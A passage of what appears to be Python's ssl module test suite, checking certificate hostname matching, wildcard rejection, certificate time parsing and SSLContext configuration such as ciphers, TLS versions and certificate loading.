# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if hasattr(socket, 'AF_INET6'):
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if hasattr(socket, 'AF_INET6'):
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
